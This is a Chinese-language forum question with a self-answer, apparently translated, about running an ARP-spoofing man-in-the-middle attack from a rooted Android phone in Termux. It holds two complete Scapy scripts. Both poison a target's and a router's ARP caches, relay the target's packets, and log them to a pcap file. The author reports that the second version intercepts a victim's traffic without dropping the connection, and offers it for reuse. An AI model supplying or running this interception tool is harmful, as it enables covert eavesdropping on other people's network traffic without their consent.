是否可以在 Termux(root Android)上通过 ARP 欺骗来拦截流量?
我有这个Python脚本:
from scapy.all import *
from scapy.interfaces import *
from threading import Thread
import logging
import time
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def arp_spoofing():
eth = Ether()
arp = ARP(pdst=target_ip, psrc=gateway_ip, op="is-at")
packet = eth / arp
while True:
sendp(packet, iface=iface, verbose=False)
time.sleep(2)
def get_mac(ip):
arp_request = ARP(pdst=ip)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answ = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
try:
return answ[0][1].hwsrc
except:
get_mac(ip)
def forward_packet(pkt):
if pkt[Ether].src == target_mac and pkt[Ether].dst == attacker_mac:
pkt[Ether].src = attacker_mac
pkt[Ether].dst = gateway_mac
sendp(pkt, verbose=False)
elif pkt[Ether].src == gateway_mac and pkt[Ether].dst == attacker_mac:
pkt[Ether].src = attacker_mac
pkt[Ether].dst = target_mac
sendp(pkt, verbose=False)
wrpcap(filename, pkt, append=True)
print(f'-----------------------------------------\nPacket intercepted:\nfrom: {pkt[IP].src}\nto: {pkt[IP].dst}\n')
layers = []
for i in range(len(pkt.layers())):
layers.append(pkt.getlayer(i).name)
print(f'Network layers: ', end='')
print(*layers)
if TCP in pkt:
print(f'TCP port: {pkt[TCP].dport}')
print('-----------------------------------------')
def sniffer():
while True:
sniff(prn=forward_packet, filter=filter, iface=iface, count=1)
iface = get_working_if()
filename = input('Name of .pcap file: ') + '.pcap'
target_ip = input('Target IP in local network: ')
target_mac = get_mac(target_ip)
gateway_ip = input('Router IP in local network: ')
gateway_mac = get_mac(gateway_ip)
attacker_mac = Ether().src
filter = f'(ip src {target_ip}) or (ip dst {target_ip})'
mitm = Thread(target=arp_spoofing)
proxy = Thread(target=sniffer, daemon=True)
proxy.start()
mitm.start()
它似乎可以在 Linux 桌面上使用 net.ipv4.ip_forward=1 运行,所以我尝试在我的 Android 手机上启用 ip_forward。
我尝试过以下命令: 1.
echo 1 | sudo grep /proc/sys/net/ipv4/ip_forward
sudo sysctl net.ipv4.ip_forward=1
它将所需的参数从 0 更改为 1,但我需要重新启动设备才能使 IP 转发工作。所以,当我这样做时,ip_forward又变成0了。
我应该怎样做才能启用 IP 转发并使此更改持久化(重新启动时保存它们)? 或者我可以使用 Scapy 和 Python 重定向流量吗?
看来我已经找到解决办法了。无需启用 ip_forward。我已经更改了代码,现在可以使用了:
from scapy.all import *
from scapy.interfaces import *
from threading import Thread
import logging
import time
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def fprint(data):
sys.stdout(data)
def arp_spoofing():
eth = Ether()
arp1 = ARP(pdst=gateway_ip, psrc=target_ip, op="is-at")
arp = ARP(pdst=target_ip, psrc=gateway_ip, op="is-at")
packet = eth / arp
packet1 = eth / arp1
while True:
sendp(packet, iface=iface, verbose=False)
sendp(packet1, iface=iface, verbose=False)
time.sleep(10)
def get_mac(ip):
arp_request = ARP(pdst=ip)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answ = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
try:
if answ[0][1].hwsrc is not None:
return answ[0][1].hwsrc
else:
get_mac(ip)
except:
get_mac(ip)
def forward_packet(pkt):
if pkt[Ether].src == target_mac and pkt[Ether].dst == attacker_mac:
pkt[Ether].src = attacker_mac
pkt[Ether].dst = gateway_mac
sendp(pkt, verbose=False)
elif pkt[Ether].src == gateway_mac and pkt[Ether].dst == attacker_mac:
pkt[Ether].src = attacker_mac
pkt[Ether].dst = target_mac
sendp(pkt, verbose=False)
wrpcap(filename, pkt, append=True)
print(f'-----------------------------------------\nPacket intercepted:\nfrom: {pkt[IP].src}\nto: {pkt[IP].dst}\n')
layers = []
for i in range(len(pkt.layers())):
layers.append(pkt.getlayer(i).name)
print(f'Network layers: ', end='')
print(*layers)
if TCP in pkt:
print(f'TCP port: {pkt[TCP].dport}')
print('-----------------------------------------')
def sniffer():
sniff(prn=forward_packet, filter=filter, iface=iface)
iface = get_working_if()
filename = input('Name of .pcap file: ') + '.pcap'
target_ip = input('Target IP in local network: ')
target_mac = get_mac(target_ip)
gateway_ip = input('Router IP in local network: ')
gateway_mac = get_mac(gateway_ip)
attacker_mac = '<MY MAC ADDRESS>'
filter = f'(ip src {target_ip}) or (ip dst {target_ip})'
mitm = Thread(target=arp_spoofing, daemon=True)
proxy = Thread(target=sniffer)
proxy.start()
mitm.start()
现在它按照我想要的方式工作了。目标保持与网络的连接,并且攻击设备拦截其流量。 我希望我的回答能够帮助面临类似任务的人。